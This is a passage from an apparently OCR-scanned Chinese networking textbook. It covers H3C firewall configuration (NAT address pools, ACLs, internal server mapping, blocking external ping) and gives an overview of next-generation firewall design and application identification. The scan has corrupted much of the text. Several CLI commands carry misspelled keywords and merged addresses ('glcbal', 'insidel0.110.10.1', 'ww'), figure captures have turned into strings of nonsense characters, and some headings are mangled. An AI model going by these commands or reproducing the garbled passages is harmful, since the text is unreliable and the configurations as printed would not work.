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Internet, 其 他 网 段 的 PC 则 不 能 访问 Internet。 外 部 的 PC 可 以 访问 内 部 的 服务 器 。 公 司 
具有 202. 38. 160. 100 至 202. 38. 160. 105 六 个 合法 的 IP 地址。 选用 202. 38. 160. 100 作 
为 公司 对 外 的 IP 地 址 , WWW 服务 器 2 对 外 采用 8080 端口 。 

(1) 配置 地 址 池 和 访问 控制 列表 ,允许 10. 110. 10. 0/24 网 段 进行 地 址 转换 。 

[H3C] nat address- group 1 202.38.160.101 202.38.160.105 

[H3C] acl number 2001 

[H3C- acl- basic- 2001] rule permit source 10.110.10.0 0.0.0.255 

[H3C- acl- basic- 2001] rule deny source 10.110.0.0 0.0.255.255 
[H3C- acl- basic- 2001] quit. 
[H3C] interface Ethernet3/0/0 
[H3C- Ethernet3/0/0] nat outbound 2001 address- group 1 


(2) 设置 内 部 FTP 服务 器 。 


[H3C- Ethernet3/0/0] nat server protocol tcp glcbal 202.38.160.100 insidel0.110.10.1 ftp 
(3) 设置 内 部 WWW 服务 器 1. 


IH3C- Ethernet3/0/0] nat server protocol tcp glcbal 202.38.160.100 insidel0.110.10.2 ww 
(4) 设置 内 部 WWW 服务 器 2。 


H3C- Ethernet3/0/0] nat server protocol tcp global 202.38.160.100 8080 insidel0.110.10.3 ww 

2) Web 配置 示例 

首先 ,通过 Console 口 设置 防火 墙 接口 地 址 、Telnet 终端 用 户 等 ( 同 交 换 机 、 路 由 器 )， 
然后 每 排 选择 出 一 台 计 算 机 来 配置 防火 墙 , 打 开 TE 浏览 器 ,在 地 址 栏 中 ,输入 防火 墙 地 
址 ,打开 防火 墙 的 登录 窗口 ,输入 用 户 名 和 密码 ,然后 单 击 Login, 进 行 防 火 墙 的 配置 界 
面 ,如 图 6.23 所 示 。 


User Login 


图 6.23 防火 墙 配置 界面 


3. 配置 访问 控制 列表 

进入 配置 界面 之 后 ,首先 配置 访问 控制 列表 (ACL) , 单 击 左 侧 “WEB 管理 ”列表 中 的 
“防火 墙 ” 列 表 下 面 的 ACL. AE 6. 24 所 示 。 

单 击 右 侧 的 “ACL 配置 信息 ”按钮 ,如 图 6.25 Bras. 

输入 一 个 ACL 编号 ,在 这 里 输入 一 个 基本 ACL 编号 ,其 中 编号 范围 为 如 下 。 


接口 ACL:1000~ 1999 
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图 6.24 控制 列表 ACL 


L awena NJ aaga | 


图 6.25 ACL 配置 


基本 ACL:2000~ 2999 
高 级 ACL:3000~ 3999 
MAC ACL:4000~ 4999 


输入 完成 之 后 , 单 击 “创建 ?按钮 ,如 图 6. 26 所 示 。 


图 6.26 ACL 夹 型 配置 


选中 上 面 创建 的 策略 , 单 击 “ 配 置 ”按钮 ,如 图 6.27 所 示 。 


规则 配置 硕 序 


图 6.27 “配置 "界面 


输入 规则 编号 ,例如 : 1,“ 操 作 ” 为 Permit,“ 源 IP 地 址 ”在 这 里 为 空 ,表示 所 有 内 网 中 
的 IP 地 址 ,输入 完 之 后 , 单 击 * 应 用 ?按钮 ,如 图 6. 28 所 示 。 
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图 6.28 基本 ACL 参数 配置 


如 果 , 只 是 想 对 内 网 中 的 一 台 或 几 台 计算 机 进行 控制 , 则 可 以 在 上 面 输 入 * 源 IP 地 
址 ”, 例 如 ,对 内 网 中 的 192. 168. 1. 0 这 一 段 地 址 进行 控制 ,可 参照 图 6. 29 所 示 。 


图 6.29 “W IP 地 址 "的 基本 ACL 参数 配置 


单 击 * 应 用 ?按钮 之 后 ,在 出 现 的 对 话 框 中 , 单 击 * 返 回 ? 按 钮 ,在 出 现 的 对 话 框 中 ,再 次 
单 击 “ 返 回 " 按 钮 。 

在 上 述 单 击 两 次 返回 按钮 之 后 ,选中 Ethernet 1/0 接口 ,然后 单 击 * 配 置 ?按钮 ,如 图 
6. 30 所 示 。 


# ROZA ASPFREMS 包 过 小 采用 的 AC 以 太 转 头 过 泥 采 用 的 ACL 


[-] 
[Da | | TI | 
[xx ] 


Ds 


图 6.30 接口 的 ACL 配置 概览 


在 出 现 的 对 话 框 中 ,* 过 滤 类 型 ?选择 packetfilter,“ ASPF 策略 号 或 ACL 编号 ”选择 
“2001” ," Ell Jr Ih” HEFE outbound, 然 后 单 击 “ 应 用 ”按钮 ,如 图 6. 31 所 示 。 之 后 在 出 现 
的 对 话 框 中 单 击 “返回 ”按钮 。 

再 次 选中 Ethernet 1/0 接口 ,然后 单 击 “ 配 置 ” 按 钮 ,如 图 6. 32 所 示 。 

在 出 现 的 对 话 框 中 ,* 过 滤 类 型 ?选择 packet-filter,“ASPF 策略 号 或 ACL 编号 ”选择 
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图 6.32 配置 后 的 接口 的 ACL 配置 概览 


“2001”, “过滤 方向 ”选择 inbound, 然 后 单 击 “ 应 用 ”按钮 ,之 后 在 出 现 的 对 话 框 中 单 击 * 返 


回 ” 按 钮 ,如 图 6. 33 所 示 。 
4) 配置 NAT 地 址 转换 
Tic X dz B WEB 管理 ”的 “业务 管理 ”>NAT-~* 地 址 池 管 理 ", 如 图 6. 34 所 示 。 


Ethernet1/0 


6.33 ”过 滤 方 向 为 inbound 的 接口 ASPF 或 ACL 配置 图 6.34 “WEB 管理” 列表 


在 右 侧 单 击 “ 创 建 " 按 钮 ,如 图 6. 35 所 示 。 
输入 地 址 池 的 各 项 参数 ,然后 单 击 " 应 用 ”按钮 ,如 图 6. 36 所 示 。 
Zn Hbc" WEB 管理 ”的 “业务 管理 ”>NAT 一 “地 址 转换 管理 ”, 如 图 6. 37 所 示 。 
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* ”地址 池 素 引号 


图 6.36 创建 NAT 地 址 池 图 6.37 地 址 转换 管理 


在 右 侧 , 单 击 “ 创 建 " 按 钮 ,如 图 6. 38 所 示 。 


地 址 池 


6.38 创建 地 址 转换 管理 


在 出 现 的 对 话 框 中 ,首先 选择 单 选 按钮 “ACL 编号 ”。 输 入 相应 的 参数 ,输入 完 之 后 ， 
单 击 “ 应 用 ”按钮 ,如 图 6. 39 所 示 。 


6.39 NAT 地 址 转换 参数 配置 
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完成 上 述 配 置 之 后 , 单 击 左 侧 "WEB 管理 ”的 “业务 管理 "~NAT-~* 内 部 服务 器 ”, 如 
图 6. 40 所 示 。 


图 6.40 内 部 服务 器 


单 击 * 创 建 ? 按 钮 ,如 图 6. 41 所 示 。 


# 局 用 NAT 内 部 服务 的 接口 


图 6.41 创建 内 部 服务 器 
输入 各 项 参数 ,如 图 6. 42 所 示 , 输 入 完成 之 后 , 单 击 “ 应 用 ”按钮 。 


图 6.42 内 部 服务 器 映射 参数 配置 
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配置 外 网 只 能 访问 内 网 的 Web 服务 器 ,而 其 他 的 访问 会 被 防火 墙 阻挡 。 
单 击 左 侧 “WEB 管理 的“ 防火墙 "~ACL, 如 图 6. 43 Bro 。 


6.43 "Bi X3" " ACL” 


GE" ACL 配置 信息 ”按钮 ,如 图 6.44 所 示 。 


[ue Aj maena | 


图 6.44 ACL 配置 信息 


输入 ACL 编号 ,然后 单 击 “ 创 建 "按钮 ,如 图 6.45 所 示 。 


6.45 创建 ACL 


选中 编号 为 “3001? 的 策略 ,然后 单 击 “ 配 置 ?按钮 ,如 图 6. 46 所 示 。 


规则 配置 硕 序 


图 6.46 配置 编号 “3001”ACL 
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输入 各 项 参数 信息 ,输入 完成 之 后 , 单 击 “ 应 用 ”按钮 ,如 图 6. 47 所 示 。 然 后 单 击 “ 返 
回 ” 按 钮 ,在 出 现 的 对 话 框 中 ,再 次 单 击 * 返 回 " 按 钮 。 


[s 


* 
E] 
« 


等 于 {x 


日 
ES 
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; | 


图 6.47 高 级 ACL 参数 配置 


选中 Ethernet 2/0 端口 ,然后 单 击 “配置 "按钮 ,如 图 6. 48 所 示 o 


ASPF 策 略 包 过 小 采用 的 ACL 以 太 臂 头 过 泥 采 用 的 ACL 


[ es] 


图 6.48 接口 的 ACL 配置 概览 


输入 各 项 参数 信息 ,如 图 6. 49 所 示 ,输入 完成 之 后 , 单 击 “ 应 用 ”按钮 。 
再 次 输入 各 项 参数 信息 ,如 图 6. 50 所 示 ,注意 过 滤 访 问 为 outbound, 输 入 完成 之 后 ， 
单 击 “ 应 用 ”按钮 ,之 后 单 击 “ 返 回 ” 按 钮 。 


Ethernet2/0 Ethernet2/0 


图 6.49 “3001”ACL 应 用 图 6.50 “3001”ACL 过 滤 方 向 为 outbound 应 用 


5. 测试 配置 的 效果 
首先 ,要 在 IP 地 址 为 192. 168. 1. 13 的 计算 机 上 建立 一 个 用 于 测试 的 Web 站 点 ， 


第 6 章 ”网络 安全 技术 


Web 站 点 建立 完成 之 后 ,在 外 网 的 一 台 计 算 机 上 ,打开 LE 浏览 器 ,在 地 址 栏 中 输入 202. 
206. 200. 254, 可 以 看 测试 站 点 ,这 说 明 在 防火 墙 NAT 中 建立 的 内 部 服务 器 成 功 ,并 且 
外 网 访问 内 网 Web 站 点 的 策略 已 经 生效 。 

然后 ,让 内 网 中 的 某 一 台 计算 机 去 ping 外 网 中 的 一 台 计 算 机 ,例如 : ping 202. 206. 
200.1, 

在 命令 提示 符 下 ,输入 以 下 命令 。 

ping 202.206.200.1 
可 以 ping 通 , 表 示 内 网 访问 外 网 的 策略 已 经 生效 。 

6. 禁止 外 网 的 计算 机 ping 防火 墙 的 外 网 端口 

在 完成 上 面 五 步 实验 之 后 ,可 以 新 建 一 条 禁止 ping 防火 墙 的 策略 。 

单 击 左 侧 "WEB 管理 的“ 防火墙 "~ACL, 如 图 6. 24 所 示 。 

Mik“ ACL 配置 信息 ”按钮 ,如 图 6. 25 所 示 。 

输入 ACL 编号 ,然后 单 击 * 创 建 "按钮 ,如 图 6. 51 所 示 。 


6.51 编号 “3002”ACL 创建 


选中 编号 为 “3002” 的 策略 ,然后 单 击 “ 配 置 "按钮 ,如 图 6. 52 所 示 。 


"Em rm 类 型 规则 数 规则 配置 顺序 


nh mm m I G | 
[Dj jl ji OO 
K 


[ ernji ss I wm j| 


图 6.52 编号 “3002”ACL 配置 


输入 各 项 参数 信息 ,如 图 6. 53 ,输入 完成 之 后 , 单 击 * 应 用 ?按钮 ,然后 单 击 “ 返 回 ” 按 
钮 ,在 出 现 的 对 话 框 中 ,再 次 单 击 “ 返 回 ” 按 钮 。 

选中 Ethernet2/0 端口 ,然后 单 击 “配置 按钮 ,如 图 6. 54 所 示 。 

输入 各 项 参数 信息 ,如 图 6. 55 所 示 ,输入 完成 之 后 , 单 击 “ 应 用 ”按钮 。 

再 次 输入 各 项 参数 信息 ,如 图 6. 56 所 示 ,注意 过 滤 访 问 为 outbound, 输 入 完成 之 后 ， 
单 击 “ 应 用 ”按钮 ,之 后 单 击 “ 返 回 ” 按 钮 。 

完成 上 述 配 置 之 后 ,用 一 台 外 网 的 计算 机 来 ping 防火 墙 的 IP 地 址 (202. 206. 200. 
254) ,可 以 看 效果 ,已 经 不 能 够 再 ping 通 , 如 图 6. 57 所 示 。 
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neuem :cv 
T d 
HIDHEIEINIEIS. 0.0.0255 


编号 “3002”ACL 参数 配置 


接口 的 ACL 配 置 概览 


nm: 1 ”页 总 数 ， 1 Xem 2 makh 15 «1» 
接口 名 称 ASPF 策 略 包 过 小 采用 的 ACL 以 太 帧 头 过 小 采用 的 ACL 


LC. ferrea | es mito zat 


图 6.54 接口 “3002”ACL 配置 概览 


packet-filter 
EUR 3002 
XXE outbound 


图 6.55 “3002”ACL 应 用 图 6.56 “3002”ACL 过 滤 方 向 outbound 应 用 


c: NDocunent Settings Widninistrator?ping 
Pinging 28 3 254 w: 32 bytes of data: 


iest timed out. 
equest timed out 


uest timed out R 


Ping statistics for 282.206.200.254: 
Packets: Sent = 4 ceived 


图 6.57 外 网 无 法 ping 通 
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6.7 下 一 代 防 天壤 


6.7.1 下 一 代 防 火 墙 概 述 


下 一 代 防 火 墙 , 即 Next Generation Firewall, 简 称 NG Firewall, 是 一 款 可 以 全 面 应 
对 应 用 层 威胁 的 高 性 能 防火 墙 。 通 过 深入 洞察 网 络 流量 中 的 用 户 、 应 用 和 内 容 , 并 借助 全 
新 的 高 性 能 单 路 径 异 构 并 行 处 理 引 擎 ,NGFW 能 够 为 用 户 提 供 有 效 的 应 用 层 一 体 化 安全 
防护 ,帮助 用 户 安全 地 开展 业务 并 简化 用 户 的 网 络 安全 架构 。 

下 一 代 防 火 墙 需 具有 下 列 最 低 属性 。 

CD 支持 在 线 BITW( 线 缆 中 的 块 ) 配 置 ,同时 不 会 干扰 网 络 运行 。 

(2) 可 作为 网 络 流量 检测 与 网 络 安全 策略 执行 的 平台 ,并 具有 下 列 最 低 特性 。 

CD 标准 的 第 一 代 防 火 墙 功能 : 具有 数据 包 过 滤 、 网 络 地 址 转换 (NAT) ,协议 状态 检 
查 以 及 VPN 功能 等 。 

Q 集成 式 而 非 托 管 式 网 络 入 侵 防 御 : 支持 基于 漏洞 的 签名 与 基于 威胁 的 签名 。IPS 
与 防火 墙 间 的 协作 所 获得 的 性 能 要 远 高 于 部 件 的 琶 加 ,如 : 提供 推荐 防火 墙 规则 ,以 阻止 
持续 某 一 载 人 IPS 及 有 害 流量 的 地 址 。 这 就 证 明 , 在 下 一 代 防 火 墙 中 ,互相 关联 作用 的 是 
防火 墙 而 非 由 操作 人 员 在 控制 台 制 定 与 执行 各 种 解决 方案 。 高 质量 的 集成 式 IPS 引擎 与 
签名 也 是 下 一 代 防 火 墙 的 主要 特性 。 所 谓 集 成 可 将 诸多 特性 集合 在 一 起 ,如 : 根据 针对 
注入 恶意 软件 网 站 的 IPS 检测 向 防火 墙 提供 推荐 阻止 的 地 址 。 

@ 业务 识别 与 全 栈 可 视 性 : 采用 非 端口 与 协议 vs 仅 端口 ,协议 与 服务 的 方式 ,识别 
应 用 程序 并 在 应 用 层 执 行 网 络 安全 策略 。 范 例 中 包括 允许 使 用 Skype 但 禁用 Skype 内 
部 共享 或 一 直 阻止 GoToMyPC 。 

CD 超级 智能 的 防火 墙 : 可 收集 防火 墙 外 的 各 类 信息 ,用 于 改进 阻止 决策 ,或 作为 优 
化 阻止 规则 的 基础 。 范 例 中 还 包括 利用 目录 集成 来 强化 根据 用 户 身份 实施 的 阻止 或 根据 
地 址 编制 黑 名 单 与 白 名 单 。 

(3) 支持 新 信息 流 与 新 技术 的 集成 路 径 升级 ,以 应 对 未 来 出 现 的 各 种 威胁 。 

一 体 化 引擎 数据 包 处 理 流 程 大 致 分 为 以 下 几 个 阶段 。 

1. 数据 包 入 站 处 理 阶段 

和 站 主要 完成 数据 包 的 接收 及 L2 一 L4 层 的 数据 包 解 析 过 程 ,并 且 根 据 解 析 结 果 决 
定 是 否 需要 进入 防火 墙 安 全 策略 处 理 流程 ,否则 该 数据 包 就 会 被 丢弃 。 在 这 个 过 程 中 还 
会 判断 是 否 经 过 VPN 数据 加 密 , 如 果 是 , 则 会 先进 行 解密 后 再 做 进一步 解析 。 

2. 主 引 擎 处 理 阶段 

主 引 擎 处 理 大 致 会 经 历 三 个 过 程 : 防火 墙 策略 匹配 及 创建 会 话 、 应 用 识别 和 内 容 
检测 。 

3. 创建 会 话 信息 

当 数据 包 进 入 主 引擎 后 ,首先 会 进行 会 话 查 找 ,看 是 否 存在 该 数据 包 相 关 的 会 话 。 如 
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果 存 在 , 则 会 依据 已 经 设 定 的 防火 墙 策 略 进行 匹配 和 对 应 。 否 则 就 需要 创建 会 话 。 具 体 
步 又 简 述 为 : 进行 转发 相关 的 信息 查找 ;而 后 进行 NAT 相关 的 策略 信息 查找 ;最 后 进行 
防火 墙 的 策略 查找 ,检查 策略 是 否 人 允许 。 如 果 允 许 则 按照 之 前 的 策略 信息 建立 对 应 的 会 
话 , 如 果 不 允许 则 丢弃 该 数据 包 。 

4. 应 用 识别 

数据 包 进行 完 初始 的 防火 墙 安 全 策略 匹配 并 创建 对 应 会 话 信息 后 ,会 进行 应 用 识别 
检测 和 处 理 , 如 果 该 应 用 为 已 经 可 识别 的 应 用 , 则 对 此 应 用 进行 识别 和 标记 并 直接 进入 下 
一 个 处 理 流程 。 如 果 该 应 用 为 未 识别 应 用 , 则 需要 进行 应 用 识别 子 流程 ,对 应 用 进行 特征 
匹配 ,协议 解码 ,行为 分 析 等 处 理 从 而 标记 该 应 用 。 应 用 标记 完成 后 ,会 查找 对 应 的 应 用 
安全 策略 ,如 果 策 略 允 许 则 准备 下 一 阶段 流程 ;如 果 策 略 不 允许 , 则 直接 丢弃 。 

5. 内 容 检测 

主 引 擎 工作 的 最 后 一 个 流程 为 内 容 检测 流程 ,主要 是 需要 对 数据 包 进 行 深层 次 的 协 
议 解码 .内容 解析 和 模式 匹配 等 操作 ,实现 对 数据 包 内 容 的 完全 解析 ;然后 通过 查找 相对 
应 的 内 容 安全 策略 进行 匹配 ,最 后 依据 安全 策略 执行 诸如 : 丢弃 、 报 警 和 记录 日 志 等 
动作 。 

6. 数据 包 出 站 处 理 阶 段 

当 数据 包 经 过 内 容 检测 模块 后 ,会 进入 出 站 处 理 流 程 。 首 先 系 统 会 路 由 等 信息 查找 ， 
然后 执行 QOS,IP 数据 包 分 片 的 操作 ,如 果 该 数据 走 VPN 通道 的 话 ,还 需要 通过 VPN 
加 密 ,最 后 进行 数据 转发 。 

7. 与 统一 策略 的 关系 

统一 策略 实际 上 是 通过 同一 套 安全 策略 将 处 于 不 同 层 级 的 安全 模块 有 效 地 整合 在 一 
起 ,在 策略 匹配 顺序 及 层次 上 实现 系统 智能 匹配 ,其 主要 的 目的 是 为 了 提供 更 好 的 可 用 
性 。 举 个 例子 : 有 些 产品 HTTP 的 检测 .URL 过 滤 是 通过 代理 模块 做 的 ,而 其 他 协议 的 
入 侵 检 测 是 用 另外 的 引擎 。 用 户 必 须 明白 这 些 模块 间 的 依赖 关系 ,分 别 做 出 正确 的 购置 
才能 达到 需要 的 功能 ,而 统一 策略 可 以 有 效 地 解决 上 述 问 题 。 

下 一 代 防 火 墙 的 执行 范例 包括 阻止 与 针对 细 粒 度 网 络 安全 策略 违规 情况 发 出 警报 ， 
如 : 使 用 Web 邮件 .Anonymizer、 端 到 端 或 计算 机 远程 控制 等 。 仅 仅 根 据 目的 地 IP 地 址 
阻止 对 此 类 服务 的 已 知 源 访问 再 也 无 法 达到 安全 要 求 。 细 粒度 策略 会 要 求 仅 阻止 发 向 其 
他 允许 目的 地 的 部 分 类 型 的 应 用 通信 ,并 利用 重新 导向 功能 根据 明确 的 黑 名 单 规则 使 其 
无 法 实现 该 通信 。 这 就 意味 着 ,即使 有 些 应 用 程序 设计 可 避 开 检测 或 采用 SSL 加 密 , 下 
一 代 防 火 墙 依然 可 识别 并 阻止 此 类 程序 。 而 业务 识别 的 另外 一 项 优点 还 包括 带宽 控制 ， 
例 : 因为 拒绝 无 用 或 不 允许 进入 的 端 到 端 流量 ,从 而 大 幅 降 低 了 带宽 的 耗 用 。 

仅 有 不 到 1% 的 互联 网 连接 采用 了 下 一 代 防 火 墙 保护 。 但 是 随 着 下 一 代 网 络 的 来 
临 , 下 一 代 防 火 墙 的 应 用 已 然 是 不 可 抗拒 的 趋势 。 

大 型 企业 都 将 随 着 正常 的 防火 墙 与 IPS. 更 新 循环 的 到 来 逐渐 采用 下 一 代 防 火 墙 代替 
其 现 有 的 防火 墙 ,或 因 带 宽 需 求 的 增高 或 遭受 攻击 而 进行 防火 墙 升 级 。 许 多 防火 墙 与 
IPS 供应 商都 已 升级 其 产品 ,以 提供 业务 识别 与 部 分 下 一 代 防 火 墙 特性 , 且 有 许多 新 兴 公 
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司 都 十 分 关注 下 一 代 防 火 墙 功能 。Gartner 的 研究 报告 说 明 , 认 为 随 着 威胁 情况 的 变化 
以 及 业务 与 IT 程序 的 改变 都 促使 网 络 安全 经 理 在 其 下 一 轮 防火 墙 /IPS 更 新 循环 中 寻求 
具有 下 一 代 防 火 墙 功 能 的 产品 。 而 下 一 代 防 火 墙 的 供应 商 们 成 功 占 有 市 场 的 关键 则 在 于 
需要 证 明 第 一 代 防 火 墙 与 IPS 特性 既 可 与 当前 的 第 一 代 功 能 相 匹 配 , 又 能 同时 兼 具 下 一 
代 防 火 墙 功能 ,或 具有 一 定价 格 优势 。 


6.7.2 下 一 代 防 火 墙 的 现实 需求 

1. 复杂 环境 下 网 络 安全 管理 的 窘境 

随 着 网 络 安全 需求 不 断 深入 ,大 量 政府 、 金 融和 大 企业 等 用 户 将 网 络 划分 为 更 为 细致 
的 安全 区 域 , 并 在 各 安全 区 域 的 边界 处 部 署 下 一 代 防 火 墙 设 备 。 对 于 所 有 的 网 络 管理 者 
来 说 ,安全 设备 数量 的 不 断 激增 无 疑 会 增加 管理 上 的 成 本 ,甚至 成 为 日 常安 全 运 维 工作 的 
负担 ,对 网 络 安全 管理 起 着 消极 的 反作用 。 对 于 大 型 网 络 而 言 ,网 络 管理 者 往往 需要 在 每 
一 台 安 全 设备 上 逐一 部 署 安全 策略 ,安全 防护 规则 等 ,并 且 在 日 常 的 维护 中 ,还 要 逐一 的 
对 设备 进行 升级 等 操作 ,类 似 重 复 的 工作 将 耗费 大 量 的 时 间 , 同 时 大 量 人 工 操 作 势 必 将 带 
来 误 配置 的 风险 。 

对 于 高 风险 、 大 流量 、 多 业务 的 复杂 网 络 环境 而 言 , 全 网 部 署 的 下 一 代 防 火 墙 设备 工 
作 在 不 同 的 安全 区 域 各 自 为 战 , 为 了 进行 有 效 的 安全 管理 ,管理 者 往往 要 单独 监控 每 一 台 
设备 的 运行 状态 .流量 情况 以 及 威胁 状况 等 ,对 于 绝 大 多 数 人 力 资源 并 不 充裕 的 信息 部 
T] ,这 无 疑 又 是 一 项 效率 低 .难度 大 的 工作 ,监控 到 的 信息 往往 由 于 实时 性 差 . 易 朴 漏 等 问 
题 ,对 全 网 安全 性 的 提升 并 无 促进 作用 。 

安全 管理 应 面向 风险 而 非 单纯 的 安全 事件 响应 ,网 络 安全 同样 遵循 这 样 的 方向 和 趋 
势 ,而 如 何 及 时 预见 风险 ,以 及 在 安全 事件 发 生 后 如 何 快速 溯源 并 采取 响应 措施 ,是 摆 在 
每 一 位 网 络 管理 者 面前 的 难题 。 专 家 认为 ,基于 大 数据 挖掘 技术 无 疑 可 以 帮助 管理 者 更 
加 快速 地 发 现 网 络 中 的 异常 情况 ,尽早 确认 威胁 并 采取 干预 措施 ,实现 主动 防御 。 而 此 方 
案 实现 的 前 提 , 则 需 具备 对 数据 的 收集 集中 能 力 以 及 智能 分 析 能 力 。 

2. 为 什么 要 识别 应 用 

随 着 以 Web 2. 0 为 代表 的 社区 化 网 络 时 代 的 到 来 ,互联 网 进入 了 以 论坛 .博客 、 社 
交 、 视 频 和 P2P 分 享 等 应 用 为 代表 的 下 一 代 互联 网 时 代 , 用 户 不 再 是 单 向 的 信息 接受 者 ， 
更 是 以 Web 应 用 为 媒介 的 内 容 发 布 者 和 参与 者 ,在 这 种 趋势 下 , 越 来 越 多 的 应 用 呈现 出 
Web 化 , 据 调查 显示 超过 90% 的 网 络 应 用 运行 于 HTTP 协议 的 80 和 443 端口 ,大 量 应 
用 可 以 进行 端口 复 用 和 IP 地 址 修改 。 

然而 ,由 于 传统 的 防火 墙 的 基本 原理 是 根据 IP 地 址 /端口 号 或 协议 标识 符 识别 和 分 
类 网 络 流量 ,并 执行 相关 的 策略 。 所 以 对 于 Web 2.0 应 用 来 说 ,传统 防火 墙 看 到 的 所 有 
基于 浏览 器 的 应 用 程序 的 网 络 流量 是 完全 一 样 的 ,无 法 区 分 各 种 应 用 程序 ,更 无 法 实施 策 
略 来 区 分 哪些 是 不 当 的 、 不 需要 的 或 不 适当 的 程序 ,或 者 允许 这 些 应 用 程序 。 如 果 通 过 这 
些 端口 屏蔽 相关 的 流量 或 者 协议 .会 导致 阻止 所 有 基于 Web 的 流量 ,其 中 包括 合法 商业 
j 途 的 内 容 和 服务 。 即 便 是 对 授权 通过 的 流量 也 会 因为 不 能 细 粒 度 的 准确 分 辨 应 用 ,而 
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使 针对 应 用 的 入 侵 攻击 或 病毒 传播 乘虚 而 人 ,使 用 户 私 有 网 络 完全 暴露 于 广域网 威胁 攻 
击 之 中 。 

综 上 所 述 ,在 新 一 代 网 络 技术 发 展 和 新 型 应 用 威胁 不 断 涌 现 的 现 有 环境 下 ,对 网 络 流 
量 进行 全 面 , 智 能 和 多 维 的 应 用 识别 需求 已 迫在眉睫 ,也 必 将 成 为 下 一 代 防 火 墙 所 必须 具 
备 的 基本 和 核心 理念 之 一 。 

3. 全 面 、 多 维 的 识别 应 用 

每 一 种 网 络 应 用 都 应 具备 多 方面 的 属性 和 特质 ,比如 商业 属性 `. 风 险 属性 、 资 源 属性 
和 技术 属性 等 等 ,只 有 从 各 个 角度 多 维 .立体 的 去 识别 一 个 应 用 才 会 更 加 全 面 和 准确 。 举 
例 来 说 ,从 商业 属性 来 讲 , 可 以 是 ERP/CRM 类 、 数 据 库 类 、 办 公 自 动 化 类 或 系统 升级 类 
应 用 ;从 风险 属性 来 讲 , 可 以 是 1 至 5 级 不 等 的 风险 级 别 分 类 ,风险 级 别 越 高 的 应 用 (如 
QQ/MSN 文件 传输 等 ) 其 可 能 带 来 的 恶意 软件 入 侵 , 资 产 泄密 的 可 能 性 就 越 高 ;从 资源 
属性 来 讲 , 可 以 是 容易 消耗 带宽 类 、 容 易 误 操作 类 或 易 规避 类 的 应 用 等 ;而 从 技术 属性 来 
讲 , 又 可 以 是 P2P 类 客户 端 /服务 器 类 或 是 基于 浏览 器 类 的 应 用 等 。 

对 应 用 的 多 维 、 立 体 识别 不 仅 是 下 一 代 防 火 墙 做 到 全 面 、 准 确 识别 应 用 的 必须 要 求 ， 
更 是 辅助 用 户 管 理应 用 、 制 定 应 用 相关 的 控制 和 安全 策略 的 关键 手段 ,从 而 将 用 户 从 史 涩 
难 懂 的 技术 语言 抽 离 出 来 , 转 而 采用 用 户 更 关心 和 可 以 理解 的 语言 去 分 类 和 解释 应 用 , 方 
便 其 做 出 正确 的 控制 和 攻防 决断 。 下 一 代 防 火 墙 必须 也 应 该 要 做 到 这 一 点 ,一 种 重要 的 
实现 手段 就 是 一 一 应 用 过 滤器 。 

应 用 过 滤器 的 关键 特点 是 提供 给 用 户 一 种 工具 ,让 用 户 通过 易于 理解 的 属性 语言 去 
多 维度 的 过 滤 和 筛选 应 用 ,经 过 筛选 过 滤 后 得 到 的 所 有 应 用 形成 一 个 应 用 集 , 用 户 可 以 对 
此 应 用 集 针 对 性 地 进行 统一 的 访问 控制 或 安全 管理 。 举 例 来 说 ,作为 边界 安全 设备 ,用 户 
希望 在 允许 内 网 用 户 与 外 网 进行 必要 的 邮件 、.IM 即时 通信 、 网 络 会 议 通信 的 同时 ,能 够 
对 其 中 的 中 、 高 级 风险 类 应 用 进行 安全 扫描 和 防护 ,保证 通信 安全 ,杜绝 威胁 入 侵 。 要 做 
到 这 点 用 户 只 要 通过 应 用 过 滤器 ,在 商业 属性 维度 给 出 选择 。 这 里 选择 协作 类 应 用 (包括 
邮件 .IM 通信 、 网 络 会 议 、 社 交 网 络 、 论 坛 贴吧 等 应 用 ), 再 在 风险 属性 维度 给 出 选择 ,这 
里 可 选择 三 级 以 上 风险 等 级 ,应 用 过 滤器 会 根据 选择 过 滤 .筛选 出 符合 维度 要 求 的 所 有 应 
用 (这 里 包括 雅虎 Mail, QQ 邮箱 MSN 聊天 、WebEx 会 议 .人 人 网 论坛 等 几 十 个 应 用 )， 
并 以 分 类 页 表 的 形式 呈现 给 用 户 , 用 户 还 可 以 通过 点 击 应 用 名 称 查看 每 个 应 用 的 详细 描 
述 信息 。 接 下 来 在 一 体 化 安全 策略 中 ,用 户 在 指定 好 IP、 安 全 区 、 时 间 和 用 户 等 基本 控制 
条 件 , 以 及 指定 好 IPS、 防 病毒 .URL 过 滤 和 内 容 过 滤 等 安全 扫描 条 件 后 ,只 要 选 定 刚才 
的 应 用 过 滤器 , 即 可 对 所 有 内 外 网 协作 且 高 风险 类 应 用 进行 全 天 24 小 时 的 安全 扫描 和 防 
护 , 当 发 现 攻击 威胁 时 及 时 阻 断 并 审计 记录 ,保障 用 户 的 应 用 安全 无 忧 。 

4. 识别 未 知 应 用 

社区 化 网 络 的 发 展 ,缩短 了 世界 各 地 用 户 经 验 交 流 和 合作 的 时 间 与 空间 ,应 用 数量 和 
种 类 及 相关 的 网 络 威胁 都 在 日 新 月 异地 增长 和 发 展 着 。 面 对 来 自 世 界 各 地 、 随 时 随地 涌 
现 的 新 类 型 .新 应 用 ,任何 一 个 安全 厂商 或 机 构 都 无 法 第 一 时 间 毫 无 遗漏 地 全 部 涵盖 和 一 
网 打 尽 。 下 一 代 防 火 墙 必须 提供 一 种 机 制 .去 第 一 时 间 识 别 和 控制 应 用 ,保障 用 户 网 络 每 
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一 秒 都 不 会 暴露 在 网 络 威胁 之 下 。 这 就 要 求 其 必须 要 具备 应 用 自 定义 的 能 力 。 

所 谓 应 用 自 定义 ,就 是 以 动态 的 方式 允许 用 户 对 某 种 / 某 些 非 通用 化 、 用 户 私有 的 无 
法 识别 的 应 用 进行 特征 化 的 描述 ,系统 学 习 并 记忆 这 种 描述 ,并 在 之 后 的 网 络 通信 中 去 智 
能 地 分 析 和 匹配 此 种 特征 ,从 而 将 其 识别 出 来 ,实现 将 应 用 由 未 知 转化 为 已 知 。 这 种 机 制 
免 去 传统 为 增加 应 用 而 重 做 的 软件 引擎 、 识 别 库 版 本 开发 .定制 .上 线 和 升级 等 大 量 工作 ， 
节省 大 量 宝贵 时 间 ,第 一 时 间 保障 用 户 网 络 安全 。 

下 一 代 防 火 墙 的 应 用 自 定义 应 该 包括 维度 归 类 和 特征 码 指定 两 部 分 。 维 度 归 类 将 自 
定义 出 的 应 用 如 同 其 他 已 有 应 用 一 样 从 多 维度 进行 分 类 划分 ,如 该 应 用 属于 哪 种 商业 类 
